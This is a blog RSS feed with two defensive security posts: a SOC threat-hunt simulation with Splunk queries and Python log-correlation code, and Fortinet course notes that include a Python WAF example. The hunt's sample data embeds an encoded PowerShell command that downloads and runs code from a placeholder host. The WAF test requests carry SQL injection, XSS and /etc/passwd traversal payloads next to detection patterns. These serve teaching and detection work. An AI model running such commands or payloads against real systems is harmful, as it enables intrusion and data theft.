<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Shibly Sadik on Medium]]></title>
        <description><![CDATA[Stories by Shibly Sadik on Medium]]></description>
        <link>https://medium.com/@shiblysadik?source=rss-79235f7f39d1------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*oS5t65KfTJJiaqSi7wSMVw.jpeg</url>
            <title>Stories by Shibly Sadik on Medium</title>
            <link>https://medium.com/@shiblysadik?source=rss-79235f7f39d1------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Fri, 22 May 2026 13:50:54 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@shiblysadik/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Threat Hunt simulation and Report Generation]]></title>
            <link>https://medium.com/@shiblysadik/threat-hunt-simulation-and-report-generation-15591bc84fe7?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/15591bc84fe7</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[report-writing]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[threat-hunting]]></category>
            <category><![CDATA[log-analysis]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Fri, 01 Aug 2025 21:23:15 GMT</pubDate>
            <atom:updated>2025-08-01T21:23:15.109Z</atom:updated>
<content:encoded><![CDATA[<p>This case study walks the analyst through a complete end-to-end threat hunting simulation using realistic logs and adversary behavior. The goal is to perform a structured hunt, identify the malicious activity, and write a professional report containing findings, indicators, and recommendations.</p><p>The scenario is post-compromise activity: initial access via phishing, followed by lateral movement and data exfiltration through a cloud file-sharing service.</p><p><strong>Phase 1 — Scenario Setup</strong><br>Background<br>A user in the Sales department reports unusual slowness and pop-ups.<br>The security team suspects the machine may have been compromised.<br>You are provided with logs from:<br>1. Sysmon (Windows event logging)<br>2. EDR (CrowdStrike)<br>3. Proxy logs (Zscaler format)<br>4. DNS logs<br>5. Authentication logs (Active Directory)</p><p><strong>Your mission is to:</strong></p><p><strong>Identify the initial infection vector.<br>Map the attacker behavior to MITRE ATT&amp;CK.<br>Correlate indicators across log sources.<br>Recommend remediation steps.</strong></p><h4>Phase 2 — Hypothesis and TTP Mapping</h4><p>Hypothesis: A phishing email led to malware execution on a workstation. The malware established persistence, then moved laterally via RDP and exfiltrated data via Dropbox.</p><p>Relevant MITRE ATT&amp;CK techniques:</p><p>T1566.001 — Phishing: Spearphishing Attachment<br>T1059.001 — Command and Scripting Interpreter: PowerShell<br>T1021.001 — Remote Services: Remote Desktop Protocol<br>T1567.002 — Exfiltration Over Web Service: Exfiltration to Cloud Storage</p><h4>Phase 3 — Threat Hunting Process</h4><p><strong>1. Identify Initial Execution</strong><br>Sysmon Event ID 1 (process creation), Splunk SPL:</p><pre>index=sysmon EventCode=1 (CommandLine=&quot;*powershell*&quot; OR CommandLine=&quot;*cmd*&quot;)<br>| where CommandLine LIKE &quot;%-EncodedCommand%&quot; OR CommandLine LIKE &quot;% -enc %&quot; OR CommandLine LIKE &quot;% -e %&quot;<br>| stats count by host, CommandLine, ParentImage, _time</pre><p>Sysmon names the parent process field ParentImage (ParentProcessName belongs to Windows Security event 4688), and PowerShell accepts abbreviated forms such as -enc and -e, so matching only the full -EncodedCommand string misses them.</p><p><strong>Finding:</strong><br>A user opened a document from their desktop. 
It spawned winword.exe, which then launched PowerShell with an encoded payload.</p><p><strong>2. Detect Persistence</strong><br>Sysmon Event ID 13 (registry value set):</p><pre>index=sysmon EventCode=13<br>TargetObject=&quot;*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*&quot;</pre><p>Sysmon records the hive as HKU\&lt;SID&gt; or HKLM rather than HKCU, so a pattern anchored on HKCU\ matches nothing; matching on the Run subkey catches both the per-user and the machine-wide keys.</p><p><strong>Finding:</strong><br>The payload added itself to the Run key for persistence.</p><p><strong>3. Lateral Movement via RDP</strong><br>Windows Security Log — Event ID 4624, logon type 10 (RemoteInteractive):</p><pre>index=wineventlog EventCode=4624 Logon_Type=10<br>| stats count by TargetUserName, Source_Network_Address, WorkstationName, host</pre><p>Field names depend on the Splunk add-on and event format: Logon_Type and Source_Network_Address for classic text events, LogonType and IpAddress for XML-rendered events. Event 4624 is written on the server that accepted the logon, so pivot on the source address or workstation name equal to the infected host; the stats output then lists every server it reached.</p><p><strong>Finding:</strong><br>RDP sessions initiated from the infected host to multiple internal servers using cached credentials.</p><p><strong>4. Exfiltration Detection (Proxy Logs)</strong><br>Zscaler format sample:</p><pre>&quot;timestamp&quot;,&quot;user&quot;,&quot;url&quot;,&quot;app_class&quot;,&quot;action&quot;,&quot;dstip&quot;<br>&quot;2024-06-22T12:45:02Z&quot;,&quot;jdoe&quot;,&quot;https://dl.dropboxusercontent.com/data.zip&quot;,&quot;Web-based file sharing&quot;,&quot;ALLOW&quot;,&quot;162.125.32.5&quot;</pre><p><strong>Query:</strong></p><pre>SELECT * FROM proxy_logs<br>WHERE url LIKE &#39;%dropbox%&#39; OR app_class=&#39;Web-based file sharing&#39;</pre><p><strong>Finding:</strong><br>Large volume of outbound HTTPS requests to Dropbox during non-working hours.</p><p><strong>5. 
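Correlate the Hunts in Code</strong></p><p>The four queries above each answer one question in one data source; the hunt's value comes from lining the answers up on a single timeline. The block below is an added example and not part of the original case study: it re-implements the four hunts in Python over constructed Sysmon, Windows Security and Zscaler-style proxy samples and merges the hits into a time-ordered attack chain tagged with the ATT&amp;CK technique IDs used in this write-up. The workstation address 10.10.5.23, the reqsize column, the TEST-NET address 203.0.113.10 and every event are constructed for the example.</p>

```python
"""Correlate constructed Sysmon, Security and proxy samples into the hunt's attack chain (steps 1 to 4)."""
import base64
import csv
import io
import re
from datetime import datetime

INFECTED_HOST, INFECTED_IP = "COMP-011", "10.10.5.23"   # the address is an assumption for the example
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# Built at runtime so it is valid UTF-16LE base64, as PowerShell expects; 203.0.113.10 is a TEST-NET address.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')".encode("utf-16-le")).decode()

SYSMON = [  # Sysmon field names; Event ID 1 = process create, Event ID 13 = registry value set
    {"EventCode": 1, "host": INFECTED_HOST, "UtcTime": "2024-06-22 09:02:40", "Image": PS,
     "ParentImage": WINWORD, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventCode": 1, "host": "COMP-012", "UtcTime": "2024-06-22 09:05:00", "Image": PS,  # benign admin script
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"EventCode": 13, "host": INFECTED_HOST, "UtcTime": "2024-06-22 09:03:05", "Image": PS,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\jdoe\AppData\Roaming\updater.exe"},
]
SECURITY = [  # Event ID 4624 is written on the *target* host; LogonType 10 = RemoteInteractive (RDP)
    {"EventCode": 4624, "host": "SRV-FILE01", "UtcTime": "2024-06-22 10:15:02", "LogonType": 10,
     "TargetUserName": "jdoe", "IpAddress": INFECTED_IP, "WorkstationName": INFECTED_HOST},
    {"EventCode": 4624, "host": "SRV-DB02", "UtcTime": "2024-06-22 10:41:19", "LogonType": 10,
     "TargetUserName": "jdoe", "IpAddress": INFECTED_IP, "WorkstationName": INFECTED_HOST},
    {"EventCode": 4624, "host": "SRV-FILE01", "UtcTime": "2024-06-22 11:00:00", "LogonType": 10,  # legitimate admin
     "TargetUserName": "itadmin", "IpAddress": "10.10.1.5", "WorkstationName": "IT-ADMIN01"},
]
PROXY_CSV = """\
"timestamp","user","url","app_class","action","dstip","reqsize"
"2024-06-22T12:45:02Z","jdoe","https://dl.dropboxusercontent.com/data.zip","Web-based file sharing","ALLOW","162.125.32.5","4096"
"2024-06-22T23:10:44Z","jdoe","https://content.dropboxapi.com/2/files/upload","Web-based file sharing","ALLOW","162.125.32.5","104857600"
"2024-06-22T23:12:01Z","jdoe","https://content.dropboxapi.com/2/files/upload","Web-based file sharing","ALLOW","162.125.32.5","98304000"
"2024-06-22T14:03:12Z","asmith","https://www.dropbox.com/home","Web-based file sharing","ALLOW","162.125.32.5","1200"
"""

ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)  # PowerShell accepts prefixes
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
CLOUD_RE = re.compile(r"dropbox(?:usercontent|api)?\.com", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def ts(s):
    """Normalise '2024-06-22 09:02:40' (Sysmon) and '2024-06-22T09:02:40Z' (proxy) to a datetime."""
    return datetime.strptime(s.replace("T", " ").rstrip("Z"), "%Y-%m-%d %H:%M:%S")


def encoded_powershell(events):
    """Step 1: PowerShell run with an encoded command; record whether an Office app is the parent."""
    hits = []
    for e in events:
        if e["EventCode"] != 1 or not e["Image"].lower().endswith("powershell.exe"):
            continue
        m = ENC_RE.search(e["CommandLine"])
        if not m:
            continue
        parent = e["ParentImage"].lower().rsplit("\\", 1)[-1]
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
        hits.append({"time": ts(e["UtcTime"]), "host": e["host"], "parent": parent,
                     "office_parent": parent in OFFICE_APPS, "decoded": decoded})
    return hits


def run_key_persistence(events):
    """Step 2: Run-key writes. Sysmon logs the hive as HKU\\<SID> or HKLM, never HKCU, so match the subkey."""
    return [e for e in events if e["EventCode"] == 13 and RUN_KEY_RE.search(e["TargetObject"])]


def rdp_from(events, source_ip):
    """Step 3: RDP logons whose source address is the infected host, as (time, target host, account)."""
    return [(ts(e["UtcTime"]), e["host"], e["TargetUserName"]) for e in events
            if e["EventCode"] == 4624 and e["LogonType"] == 10 and e["IpAddress"] == source_ip]


def off_hours_cloud_uploads(csv_text, work_start=8, work_end=18):
    """Step 4: file-sharing traffic outside business hours, aggregated per user.
    Hours are compared in UTC here; a real hunt converts to the user's local time zone first."""
    per_user = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if not (CLOUD_RE.search(row["url"]) or row["app_class"] == "Web-based file sharing"):
            continue
        when = ts(row["timestamp"])
        if work_start <= when.hour < work_end:
            continue
        agg = per_user.setdefault(row["user"], {"first": when, "requests": 0, "bytes": 0})
        agg["requests"] += 1
        agg["bytes"] += int(row["reqsize"])
    return per_user


def build_timeline():
    """Merge the four hunts into one time-ordered list of (time, technique ID, detail)."""
    tl = [(h["time"], "T1059.001", f"{h['host']}: {h['parent']} spawned encoded PowerShell: {h['decoded'][:24]}")
          for h in encoded_powershell(SYSMON) if h["office_parent"]]
    tl += [(ts(e["UtcTime"]), "T1547.001", f"{e['host']}: {e['TargetObject']}") for e in run_key_persistence(SYSMON)]
    tl += [(t, "T1021.001", f"{INFECTED_HOST} -> {host} as {user}") for t, host, user in rdp_from(SECURITY, INFECTED_IP)]
    tl += [(a["first"], "T1567.002", f"{u}: {a['requests']} off-hours file-sharing requests, {a['bytes']} bytes")
           for u, a in off_hours_cloud_uploads(PROXY_CSV).items()]
    return sorted(tl)
```

<p>Two details matter beyond the SPL: the registry match is on the Run subkey rather than the HKCU prefix, because Sysmon logs the hive as HKU\&lt;SID&gt;, and the off-hours check is done in UTC here, so a real hunt converts timestamps to the user's local time zone before applying it. The benign COMP-012 script and the legitimate admin RDP logon are there to show that each hunt filters on behaviour, not just on the presence of PowerShell or RDP.</p><p><strong>6. 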
Enrich With Threat Intelligence</strong></p><p><strong>Lookup IOC:</strong></p><p>The PowerShell C2 IP was found in ThreatFox and VirusTotal as linked to AsyncRAT campaigns.</p><p><strong>Phase 4 — Report Writing</strong><br>Report Template<br>Title: Threat Hunting Report — Phishing to Exfiltration via Dropbox<br>Date: 2025-06-30<br>Author: [Your Name]<br>Scope: Workstation COMP-011 / User jdoe<br>Tools Used: Splunk, MISP, KQL, Sysmon, Proxy Logs, EDR Console</p><p><strong>Findings Summary</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/785/1*Qgg9nQXD_sH52LU7fHXVQQ.png" /></figure><p><strong>MITRE ATT&amp;CK Mapping</strong></p><p>T1566.001 — Spearphishing Attachment<br>T1059.001 — PowerShell Execution<br>T1547.001 — Registry Run Key Persistence<br>T1021.001 — RDP Movement<br>T1567.002 — Exfiltration to Cloud Storage (Exfiltration Over Web Service)</p><p><strong>Recommendations</strong></p><p>1. Isolate host COMP-011 and reset the affected credentials<br>2. Block outbound connections to dropboxusercontent.com<br>3. Deploy EDR remediation playbooks on all lateral-movement targets<br>4. Strengthen the email gateway to detect macro-enabled documents<br>5. Hunt for the same IOC patterns across the fleet</p><p><strong>Deliverables</strong><br>.pdf report<br>.ioc file with all extracted indicators<br>.csv of all log events matching the threat behavior<br>Sigma rule for detecting this behavior chain</p><p><strong>Summary</strong><br>This simulation demonstrates how structured threat hunting using correlated logs, threat intelligence, and detection engineering can surface advanced threats that evade traditional alerting. Real-world Blue Teams should maintain playbooks, enrichments, and hunting dashboards so that this process can be repeated quickly in live environments.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[FCF-Fortinet Cyber Security Fundamentals 3.0]]></title>
            <link>https://medium.com/@shiblysadik/fcf-fortinet-cyber-security-fundamentals-3-0-c006df27f3fc?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/c006df27f3fc</guid>
            <category><![CDATA[blue-teaming]]></category>
            <category><![CDATA[fortinet]]></category>
            <category><![CDATA[defensive-security]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Sun, 27 Jul 2025 19:37:42 GMT</pubDate>
            <atom:updated>2025-07-27T19:37:42.497Z</atom:updated>
<content:encoded><![CDATA[<h3>Firewalls</h3><h4>Learning Objectives:</h4><p>1. Define firewalls and their evolution</p><p>2. Describe how firewalls work</p><p>3. Explain the current state of firewall technology</p><h4>The Evolution of Firewalls:</h4><ol><li>Packet filter / stateless firewall</li><li>Stateful firewall</li><li>Third-generation firewall</li><li>Next-generation firewall (NGFW)</li></ol><h4>How Firewalls Work:</h4><p>First-generation firewall —</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/701/1*6vEwANHqy6Fd6mynH2Nwvw.png" /></figure><p>Second-generation firewall —</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IsvXeVtlQENh96BJqc2NvA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/714/1*219ILe9JlpzO7koP75ut2g.png" /></figure><p>Third-generation firewalls —</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/703/1*XukYheglCcy5co3inm1kHA.png" /></figure><p>Traffic handling in the latest firewalls —</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/721/1*PtQ2xOS1yCj7NTzHrEOkCw.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/673/1*zq8ksP4Q1We77cHd_W-BYQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*ZVLaorX_3v4k6df-wsPZ4Q.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/711/1*Yj20tC4KvBOw0g_F7meGvQ.png" /></figure><h3>Network Access Control:</h3><p>Network access control (NAC), also known as network admission control, is the process of restricting unauthorized users and devices from gaining access to a corporate or private network. 
NAC ensures that only users who are authenticated and devices that are authorized and compliant with security policies can enter the network.</p><p>As endpoints proliferate across an organization — typically driven by <a href="https://www.fortinet.com/resources/cyberglossary/byod">bring-your-own-device (BYOD)</a> policies and an expansion in the use of Internet-of-Things (IoT) devices — more control is needed. Even the largest IT organizations do not have the resources to manually configure all the devices in use. The automated features of a NAC solution are a sizable benefit, reducing the time and associated costs of authenticating and authorizing users and determining that their devices are compliant.</p><p>Further, cyber criminals are well aware of this increase in endpoint usage and continue to design and launch sophisticated campaigns that exploit any vulnerabilities in corporate networks. With more endpoints, the attack surface increases, which means more opportunities for attackers to gain access. NAC solutions can be configured to detect unusual or suspicious network activity and respond with immediate action, such as isolating the device from the network to prevent the potential spread of the attack.</p><p>Although <a href="https://www.fortinet.com/content/dam/fortinet/assets/white-papers/wp-evolution-of-network-access-control.pdf">IoT and BYOD have changed NAC solutions</a>, NAC also serves as a perpetual inventory of users, devices, and their level of access. It serves as an active discovery tool to uncover previously unknown devices that may have gained access to all or parts of the network, requiring IT administrators to adjust security policies.</p><p>Further, organizations can choose how NAC will authenticate users who attempt to gain access to the network. 
IT admins can choose multi-factor authentication (MFA), which provides an additional layer of security on top of username and password combinations.</p><p>Restricting network access also means controlling the applications and data within the network, which are normally the target of cyber criminals. The stronger the network controls, the more difficult it will be for any cyberattack to infiltrate the network.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/695/1*N2UuDlokURYDWL_TFaScpw.png" /></figure><h3>What Are The Advantages of Network Access Control?</h3><p>Network access control comes with a number of benefits for organizations:</p><ol><li>Control the users entering the corporate network</li><li>Control access to the applications and resources users aim to access</li><li>Allow contractors, partners, and guests to enter the network as needed but restrict their access</li><li>Segment employees into groups based on their job function and build role-based access policies</li><li>Protect against cyberattacks by putting in place systems and controls that detect unusual or suspicious activity</li><li>Automate <a href="https://www.fortinet.com/resources/cyberglossary/incident-response">incident response</a></li><li>Generate reports and insights on attempted access across the organization</li></ol><h4>Current NAC Capabilities:</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/666/1*9OqXYSFYOnQhztKUuzse9Q.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/706/1*4qJye0o62fzTSAmvDg3xag.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/742/1*z2p6oC7KsTh9JFGl4AfLWw.png" /></figure><h4>Sandbox:</h4><p>A sandbox in computer security is an isolated environment used to safely execute and test untrusted programs, code, or files without risking harm to the host system or network. 
It acts as a containment area where potentially malicious activities can be observed and analyzed without affecting the broader system. This approach is particularly useful for identifying and mitigating threats such as malware, zero-day exploits, and other cyber risks.</p><p>Sandboxing is often implemented through virtualization, where a restricted environment mimics the target system’s operating environment, allowing security professionals to analyze the behavior of suspicious files or applications. For example, security researchers use sandboxes to examine malware by running it in a controlled setting, observing its actions, and determining its potential impact on the system. This method is also widely used by developers to test new code before deploying it to production environments.</p><p>There are various types of sandboxing, including application sandboxing, web browser sandboxing, and network sandboxing, each designed to isolate specific components of a system for enhanced security. Additionally, sandboxes can be implemented at the operating system level, such as in Android, where each application runs in its own sandboxed environment, or in Windows with features like Windows Sandbox. These mechanisms help prevent unauthorized access to sensitive data and limit the spread of vulnerabilities.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/714/1*AuI6rDQF9z5nYqlaBKHPiQ.png" /></figure><h4>WAF (Web Application Firewall):</h4><p>A <strong>web application firewall (WAF)</strong> is an <a href="https://en.wikipedia.org/wiki/Web_application_firewall">application firewall</a> for HTTP applications. It applies a set of rules to an HTTP conversation. 
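</p><p>What "applying a set of rules to an HTTP conversation" looks like in practice is easiest to see in code. The block below is an added example, not FortiWeb's logic or code from this page: it URL-decodes each request parameter (twice, because double encoding is a standard evasion against single-decode inspection), matches the result against crude signatures for the attack classes this section names, and honours a per-application exception, which is the kind of customization the section says must be maintained as the application changes. The rule identifiers, the /cms/editor path, the body_html parameter and all sample requests are constructed for the example.</p>

```python
"""A minimal rule-based WAF check: decode, inspect, match, honour per-application exceptions."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# (rule id, what it inspects, pattern). Crude signatures for the attack classes the section names.
RULES = [
    ("sqli-001", "param", re.compile(r"(?i)\b(?:or|and)\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+|union\s+select|--\s|;\s*drop\s")),
    ("sqli-002", "param", re.compile(r"(?i)'\s*(?:or|and)\s+'[^']*'\s*=\s*'")),
    ("xss-001", "param", re.compile(r"(?i)<\s*script|javascript:|\bon(?:error|load|click)\s*=")),
    ("lfi-001", "param", re.compile(r"(?i)(?:\.\./){2,}|/etc/passwd|\\windows\\win\.ini")),
    ("method-001", "method", re.compile(r"^(?:TRACE|TRACK)$")),
]
# Application-specific tuning (constructed): parameters under this path prefix may legitimately carry HTML.
EXCEPTIONS = {"/cms/editor": {"body_html"}}


def decode_value(value, rounds=2):
    """URL-decode up to `rounds` times; double encoding is a standard trick against single-decode inspection."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect(method, target, body=""):
    """Evaluate one request (method, path?query, form body). Returns ("allow"|"block", [(rule, where, value)])."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    exempt = next((names for prefix, names in EXCEPTIONS.items() if parts.path.startswith(prefix)), set())
    matched = []
    for rule_id, where, rx in RULES:
        if where == "method":
            if rx.search(method):
                matched.append((rule_id, "method", method))
            continue
        for name, value in params:
            if name not in exempt and rx.search(decode_value(value)):
                matched.append((rule_id, name, value))
    return ("block" if matched else "allow"), matched


# Constructed requests; the last two show the same body blocked on one path and allowed on the tuned one.
REQUESTS = [
    ("GET", "/search?q=red+shoes", ""),
    ("GET", "/login?user=admin&pass=%27%20OR%201%3D1--%20", ""),
    ("GET", "/item?id=1%2520UNION%2520SELECT%2520password%2520FROM%2520users", ""),   # double-encoded
    ("GET", "/profile?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E", ""),
    ("GET", "/download?file=..%2F..%2F..%2Fetc%2Fpasswd", ""),
    ("TRACE", "/", ""),
    ("POST", "/comment", "body_html=%3Ca+href%3D%22javascript%3Avoid(0)%22%3Ex%3C%2Fa%3E"),
    ("POST", "/cms/editor", "body_html=%3Ca+href%3D%22javascript%3Avoid(0)%22%3Ex%3C%2Fa%3E"),
]


def decisions(requests=REQUESTS):
    """Decision and first matched rule id for each request, in order."""
    out = []
    for method, target, body in requests:
        verdict, matched = inspect(method, target, body)
        out.append((verdict, matched[0][0] if matched else None))
    return out
```

<p>The decode step is what separates a useful WAF from a string match: the double-encoded UNION SELECT in the third request reaches the signature only after the second decode. The exception table is the other half of the story; without it the CMS editor would be blocked on every save, which is exactly the false-positive pressure that makes WAF tuning an ongoing cost.</p><p>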
Generally, these rules cover common attacks such as <a href="https://owasp.org/www-community/attacks/xss">Cross-site Scripting (XSS)</a>, <a href="https://owasp.org/www-community/attacks/SQL_Injection">SQL Injection</a>, file inclusion, and security misconfiguration.</p><p>While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications, and is typically deployed as a <a href="https://en.wikipedia.org/wiki/Reverse_proxy">reverse proxy</a> in front of them.</p><p>WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*WQwzXol_oPeDSYChoVTLVA.png" /></figure><h4>FortiWeb:</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/723/1*S0fwFi3fJgfETiCd9aneCw.png" /></figure><h4>Secure Email Gateway:</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*Qi1_Zz5N9zzkWz96vjz7qQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*70sdBIulzfZQfI2LX9-Rug.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/681/1*9X_IxGCSqSIpubeJaSCvBg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/671/1*VJxnngH_rbQfBG0rfjIZvw.png" /></figure><h4>Content Filtering:</h4><p>Content filtering is the screening of content to restrict or block websites. This could include material that compromises security or breaches internal content consumption policies.</p><p>Content filters <a href="https://nordlayer.com/blog/how-to-block-websites-in-a-workplace/">manage employee access to websites</a>, emails, or mobile communications. Almost all organizations have some form of filtering system. 
But filtering varies in form and scope, and many options are available.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/723/1*zAoDNnWfL3VIxO-3KljmCQ.png" /></figure><h3>Secure Wi-Fi</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/707/1*6AHDhFOA6qFawG8Vt7Z6Jg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/680/1*GsW2YB0KsmVZM24FzOKy9g.png" /></figure><h3><strong>Endpoint Hardening Techniques:</strong></h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/708/1*H_Ev5PQl2FxXwdMmkHp0GQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*Zhbor0kZmHPonpdEM_Qv4Q.png" /></figure><p>Local endpoint protection techniques encompass a variety of methods and tools aimed at securing individual devices (endpoints) such as laptops, desktops, and mobile devices from cyber threats. The key techniques are summarized below; bracketed numbers refer to the sources listed at the end of this section.</p><p><strong>Endpoint Protection Platforms (EPP)</strong><br>These are suites of security tools installed locally on each device. EPP includes traditional antivirus, anti-malware, data encryption, intrusion prevention, and data loss prevention (DLP). They work to <strong>prevent</strong> attacks by detecting and blocking known threats on the endpoint. EPP tools often provide centralized management for easier administration across many devices [1, 8].</p><p><strong>Endpoint Detection and Response (EDR)</strong><br>EDR complements EPP by continuously monitoring endpoint behavior. It detects suspicious or malicious activities, provides context for investigations, and enables rapid incident response. EDR records endpoint activity in real time, helping to uncover threats that bypass preventive measures [1, 6].</p><p><strong>Antivirus and Anti-Malware Software</strong><br>Core tools that scan for known malicious code signatures and behaviors. 
They should be kept up to date with the latest threat definitions and may include real-time protection to block threats as they arise [2, 5, 7].</p><p><strong>Patch Management</strong><br>Regularly updating the operating system and installed software closes vulnerabilities that attackers exploit. Automated patch management tools help maintain endpoint security hygiene by applying patches promptly [2, 5].</p><p><strong>Least Privilege Access Control</strong><br>Limiting user permissions to the minimum necessary reduces the risk that attackers can escalate privileges if they compromise an endpoint. Removing local administrator rights is a vital preventive tactic in this category [1, 2, 5].</p><p><strong>Application Control</strong><br>Tools like Windows Defender Application Control (WDAC) and AppLocker restrict which applications and scripts can run on an endpoint, blocking unauthorized or potentially malicious software execution [2].</p><p><strong>Attack Surface Reduction and System Hardening</strong><br>Techniques to reduce the attack vectors include:</p><ul><li>Disabling unnecessary services and features</li><li>Restricting file types, especially scripting files</li><li>Enabling Secure Boot so that only signed, trusted software loads at startup</li><li>Applying firewall rules to control inbound and outbound traffic</li><li>Using virtualization-based security to isolate core OS functions [2, 5]</li></ul><p><strong>Full Disk Encryption</strong><br>Encrypting the entire disk, typically using tools like BitLocker, protects data on stolen or lost devices by requiring authentication to access stored information [2, 5, 6].</p><p><strong>User Authentication Monitoring</strong><br>Monitoring login attempts and differentiating between legitimate users and suspicious access attempts helps detect compromised accounts or insider threats [1].</p><p><strong>DNS Filtering</strong><br>Blocking access to known malicious websites at the endpoint level as a preventive measure against malware downloads and phishing attacks [2].</p><p><strong>Privileged Access Workstations (PAW) and Privileged Access Management (PAM)</strong><br>These strategies secure and tightly monitor administrative access, often requiring the use of dedicated, highly secured machines for sensitive tasks to minimize risk [2].</p><p><strong>Behavioral Analysis and Machine Learning</strong><br>Advanced endpoint protection solutions employ machine learning to identify unusual patterns and emerging threats beyond signature-based detection, adapting to new attack techniques [1, 3, 5].</p><p>In practice, a <strong>layered defense approach</strong> that combines several of these techniques is most effective at covering the broad spectrum of threats endpoints face. For example, combining an EPP solution with continuous EDR monitoring, proper patching, least privilege policies, and system hardening greatly enhances protection.</p><p>Modern local endpoint protection involves the integration of these techniques into cohesive platforms (like Microsoft Defender for Endpoint, Trellix Endpoint Security, and FortiEDR) that provide real-time monitoring, centralized policy enforcement, automated investigation, and remediation capabilities [1, 4, 6].</p><p>This collection of endpoint protection techniques addresses prevention, detection, and response — the key pillars needed to secure endpoints in today’s complex threat landscape.</p><ol><li>https://www.bluevoyant.com/knowledge-center/what-is-endpoint-protection-solutions-and-best-practices</li><li>https://netcompany.com/a-guide-to-endpoint-security/</li><li>https://www.adminbyrequest.com/en/blogs/top-strategies-for-effective-endpoint-security</li><li>https://www.sentinelone.com/cybersecurity-101/endpoint-security/endpoint-protection-solutions/</li><li>https://www.adminbyrequest.com/en/blogs/mastering-endpoint-security-essential-strategies-and-solutions</li><li>https://www.fortinet.com/uk/resources/cyberglossary/types-of-endpoint-security</li><li>https://learn.microsoft.com/en-us/intune/configmgr/protect/deploy-use/endpoint-antimalware-policies</li><li>https://www.paloaltonetworks.com/cyberpedia/what-is-endpoint-protection</li><li>https://perception-point.io/guides/endpoint-security/how-to-choose-an-endpoint-protection-platform-epp/</li></ol><h3>Endpoint Monitoring:</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/685/1*eBxP4oZasTTes2vti9CSwg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/719/1*1oMbzGRjArHGQlq38WRSCQ.png" /></figure><h3>SOAR: Security Orchestration, Automation and Response</h3><p>SOAR stands for Security Orchestration, Automation, and Response. It is a technology solution designed to help security operations teams manage, automate, and coordinate their cybersecurity processes and incident response in a more efficient and standardized way.</p><h3>What Does SOAR Do?</h3><ul><li>Orchestration: Connects and integrates multiple security tools 